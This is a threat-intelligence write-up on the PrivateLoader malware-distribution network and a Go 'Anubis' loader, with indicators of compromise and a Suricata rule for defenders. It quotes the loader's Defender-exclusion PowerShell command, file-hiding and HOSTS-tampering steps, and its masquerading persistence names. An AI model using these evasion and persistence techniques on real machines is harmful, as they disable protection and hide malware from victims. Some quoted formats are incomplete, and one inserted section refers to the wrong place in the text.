PrivateLoader to Anubis Loader

By Jason Reaves and Joshua Platt
Published: 2022-02-14 · 6 min read

Intel471 released a report[1] on a loader system being leveraged for distribution of various crimeware malware families:

- Qbot
- SmokeLoader
- TrickBot
- NanoCore RAT
- Redline stealer
- njRat
- Djvu ransomware
- Vidar stealer
- Remcos RAT
- Tofsee spambot
- QRat
- Lockbit ransomware
- Dridex
- DanaBot

The diversity of the malware families led the Walmart Cyber Intel team to investigate further.

Infrastructure Analysis

The report mentioned an administrator panel located on the main command and control server. The panel is named “EZCubePanel” by the author. The configuration options are fairly straightforward, as laid out in the Intel471 report. The panel is configured to deliver links and browser extensions.

[Image: Links]

The browser extensions appeared to be suspended at the time but were likely utilized in previous campaigns.

[Image: Extensions]

While the AdminLTE open source bootstrap template has been implemented to streamline the UI, the main functionality is implemented in PHP. Curiously, two geo tags appear to be linked to specific domains: the tag WW_5 is hard coded for ezsoftware[.]ru, while the tag WW_8 is linked to vip-space[.]com and vip-files[.]com.

[Image: Domains]

Installer

The PrivateLoader installer makes some interesting requests.
Sample:

    941c7e39e8ea114465eadbd45aa709d55ad36ba551cbbf552e4c09b494a3a32d

After downloading a proxy list and contacting statistics.php, the payload link is encrypted with a simple XOR routine (single-byte key 0x1d) and delivered to the client. Decoding it in a Python session:

    >>> for i in range(len(b)):
    ...     b[i] ^= 0x1d
    ...
    >>> b
    bytearray(b'URL:https://cdn.discordapp.com/atta

Database

Infection counts show a large loader based system, which mimics some of the data presented in the report by Intel471.

Extension infection stats:

[Image]

Logger infection stats from deliveries:

[Image]

Loaders Loading Loaders

According to the report, “Privacy tools” domains were utilized as a primary delivery for SmokeLoader. After checking out a few of the domains, some interesting stats were discovered. In November of 2021, over a period of 20 days there were over 125K loads. For December 2021, roughly 82K for pab2 and pab3.

[Image: Stats]

The stat panel below appeared to show loads for the affiliate IDs pub1, pub2 and pub3: nearly 33K loads in nine days.

[Image: Current Stats]

During our investigation we found other loaders delivered by PrivateLoader, similar to what the report stated. However, during some of the loader executions we observed traffic that did not appear to line up with the other stealers.

After further inspection of the ‘build_dl’ traffic, one of the uncovered loader samples turned out to have been developed in Go.
Upon execution, the sample performs a check to see if it has admin privileges by attempting to open \\PHYSICALDRIVE:

[Image]

Next it takes a screenshot:

[Image]

And then proceeds to install itself:

[Image]

Some of the strings are obfuscated, but the deobfuscation is simply subtracting one from every character:

    def deobf(a):
        # Every obfuscated byte is the plaintext byte plus one,
        # so subtracting one from each byte recovers the string.
        b = bytearray(a)
        for i in range(len(b)):
            b[i] -= 1
        return b

So now we can easily map out the install process steps. The malware leverages PowerShell to set up some Defender exclusion paths:

    powershell -Command Add-MpPreference -ExclusionPath

on:

    AppData\Local\Temp
    AppData\Local\Microsoft

It sets a run key in Software\Microsoft\Windows\CurrentVersion\Run; the registry value name and the install name are randomly generated from hardcoded lists of possibilities. Install names:

- svchost
- csrss
- rundll32
- winlogon
- smss
- taskhost
- unsecapp
- AdobeARM
- winsys
- jusched
- BCU
- wscntfy
- conhost
- csrss
- dwm
- sidebar
- ADService
- AppServices
- acrotray
- ctfmon
- lsass
- realsched
- spoolsv
- RTHDCPL
- RTDCPL
- MSASCui

Registry names:

- Trion Softworks
- Mystic Entertainment
- Microsoft Partners
- Client-Server Runtime Subsystem
- Networking Service

After moving itself to the proper location it will use ‘attrib’ to set itself as a system file and hidden:

    attrib +S +H

along with altering the HOSTS file (edited for brevity):

[Image]

and flushing the DNS cache:

    ipconfig //flushdns

After installation the bot will connect to the C2 either over HTTP or TCP and register itself by sending various information back to the C2. Over TCP the registration message is built as:

    md5(cmd /c whoami) + “->Reg->[“ + Datetime + ”]->” + + “->” + + “->” + + “->” + + “->” + Bot Build +
[Image: Bot registration]

For HTTP traffic an example can be seen below; the data sent to the server is obfuscated by adding two to every byte:

    POST /callback HTTP/1.1
    Host: redacted.x.x.x
    User-Agent: Go-http-client/1.1
    Content-Length: 57
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip

    callback=HktgYcnn%22Cffgf%22%2F%22lwuejgf&reginfo=WugtMKV

After registration, the bot will check for tasks to perform:

[Image: Task parsing]

[Image: Task Commands]

Panel

The panel refers to itself as ‘ANUBIS PANEL’ and contains roughly 20K bots. The bots appeared to be leveraged for crypto mining and distributing other malware.

[Image: PPI stats]

By country:

[Image]

Country map for installs:

[Image]

Install stat slice from January:

[Image]

The stats clearly show Anubis operators have been delivering thousands of installs each week. In the case of Anubis, more than 500 unique binaries were distributed. The delivered tasks from Anubis also appear to overlap with those of PrivateLoader. Over a period of 12 days, more than 11 GB of stealer logs were collected. While cracked software is often overlooked in the world of cybercrime, it is clearly underestimated as a tactic.
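Pulling together the three byte-level encodings described in this post (the XOR with 0x1d applied to the PrivateLoader payload link, the subtract-one string obfuscation in the Go loader, and the add-two encoding of the callback data), the following Python is an added example written for this page; it is not code from the original article and it does not reproduce the malware. The sample inputs are constructed from values quoted above: the payload-link blob is rebuilt from the plaintext prefix shown in the Python session, the obfuscated install name from “svchost”, and the TCP fragment from an assumed header shape (the real fields after the timestamp are not shown in the post), while the HTTP body is the one captured in the request. The five bytes in the Suricata rule’s content match, |54 67 69 2f 40|, are exactly “Reg->” after the add-two shift, which the REG_MARKER_ENCODED constant reproduces.

```python
"""Decoders for the three byte-level encodings seen in PrivateLoader and Anubis.

Added example, not code from the original article or from the malware:
  - PrivateLoader payload link: every byte XORed with 0x1d
  - Anubis string obfuscation:  every byte is plaintext + 1
  - Anubis HTTP/TCP callbacks:  every byte is plaintext + 2

Sample inputs below are constructed from the values quoted in the post.
"""
from typing import Dict, Optional
from urllib.parse import parse_qsl


def shift_bytes(data: bytes, delta: int) -> bytes:
    """Add `delta` to every byte, wrapping modulo 256 (delta may be negative)."""
    return bytes((b + delta) & 0xFF for b in data)


def xor_bytes(data: bytes, key: int = 0x1D) -> bytes:
    """XOR every byte with a single-byte key (PrivateLoader payload link)."""
    return bytes(b ^ key for b in data)


def decode_payload_link(blob: bytes) -> str:
    """Decode a PrivateLoader payload-link blob and validate the 'URL:' prefix."""
    plain = xor_bytes(blob)
    if not plain.startswith(b"URL:"):
        raise ValueError("not a PrivateLoader payload link (missing URL: prefix)")
    return plain[len(b"URL:"):].decode("ascii")


def deobf_string(obf: bytes) -> str:
    """Anubis string deobfuscation: subtract one from every byte."""
    return shift_bytes(obf, -1).decode("latin-1")


def decode_callback_body(body: str) -> Dict[str, str]:
    """Decode an Anubis HTTP callback body: URL-decode, then subtract two per byte.

    The shift is applied after URL-decoding, because the %22 / %2F escapes in
    the captured request are themselves shifted bytes (0x20 + 2, 0x2d + 2).
    """
    fields = parse_qsl(body, keep_blank_values=True, encoding="latin-1")
    return {k: shift_bytes(v.encode("latin-1"), -2).decode("latin-1") for k, v in fields}


# The Suricata rule in the IOC section matches these five bytes in TCP
# registration traffic; they are "Reg->" after the add-two encoding.
REG_MARKER_ENCODED = shift_bytes(b"Reg->", 2)  # b"Tgi/@"


def find_registration_marker(tcp_payload: bytes) -> Optional[str]:
    """Return the decoded text from the 'Reg->' marker onwards, if present."""
    idx = tcp_payload.find(REG_MARKER_ENCODED)
    if idx < 0:
        return None
    return shift_bytes(tcp_payload[idx:], -2).decode("latin-1")


# --- constructed samples (labelled; not captured data except where noted) ---
# Payload-link blob rebuilt by XORing the plaintext prefix quoted in the post.
SAMPLE_LINK_BLOB = xor_bytes(b"URL:https://cdn.discordapp.com/atta")

# Obfuscated install name built by adding one to "svchost" from the install-name list.
SAMPLE_OBF_NAME = shift_bytes(b"svchost", 1)

# HTTP body exactly as captured in the post's POST /callback request.
SAMPLE_CALLBACK_BODY = "callback=HktgYcnn%22Cffgf%22%2F%22lwuejgf&reginfo=WugtMKV"

# TCP registration fragment: an assumed md5-prefix / timestamp shape, add-two encoded.
SAMPLE_TCP = shift_bytes(b"0123abcd->Reg->[2022-02-14]->", 2)


if __name__ == "__main__":
    print(decode_payload_link(SAMPLE_LINK_BLOB))
    print(deobf_string(SAMPLE_OBF_NAME))
    print(decode_callback_body(SAMPLE_CALLBACK_BODY))
    print(REG_MARKER_ENCODED)
    print(find_registration_marker(SAMPLE_TCP))
```

Decoding the captured HTTP body yields a readable callback string and a second field, which is what an analyst would want to confirm before writing content matches: the Suricata rule above keys on the encoded form of “Reg->”, so any detection for the HTTP path should likewise match the shifted bytes rather than the plaintext.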
IOCs

- Privacy-tools-for-you-777[.]com
- 2.56.59[.]42
- 212.193.30[.]29
- 212.193.30[.]45
- privacy-tools-for-you-782[.]com
- file-coin-host-12[.]com
- host-file-file0[.]com
- privacy-tools-for-you-781[.]com
- coin-file-file-19[.]com
- coin-coin-file-9[.]com
- file-file-host8[.]com
- data-host-coin-8[.]com
- file-file-host4[.]com
- host-data-coin-11[.]com

Anubis Loader:

- 84b33d3b0c1e396758f9591e797f5b0029be3f6a752dc2bec2dc20a85d68adda
- b7e657155c23d71f732171d68764793bb6010d42da1f80eb4dc9a630aeae1307
- 4b5b660add37cd7a6d6a2444c3d410ed0de1c24e59c5e1d0091976bbc8099fef

TCP traffic Suricata rule:

    alert tcp $HOME_NET any -> $EXTERNAL_NET any ( msg:"Anubis Registration"; content:"|54 67 69 2f 40|"

References

1: https://intel471.com/blog/privateloader-malware
2: https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer

Source: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e